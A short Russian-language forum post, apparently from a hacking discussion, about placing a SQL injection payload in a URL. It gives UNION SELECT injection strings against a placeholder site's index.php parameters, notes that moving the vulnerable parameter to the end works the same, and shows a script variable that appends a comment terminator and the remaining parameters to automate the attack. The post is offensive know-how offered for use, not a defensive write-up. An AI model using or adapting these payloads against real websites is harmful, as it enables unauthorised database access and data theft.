ну я просто поменяю местами параметры и поставлю в конец уязвимый параметр и всё ))

при твоем условиии так
www.pupkin.com/index.php?param2=13&param1=1+union+select+1,2,3--+

пашет как на
www.pupkin.com/index.php?param1=1+union+select+1,2,3--+&param2=13

но удобно автоматизировать, так как если там много параметров по с примером пашкелы будет длинный коммент типа:
$filtr_c = "--+&param2=13&param2=1543&param3=43&param5=545&param 6=132342&param7=54&param8=13"; # close SQL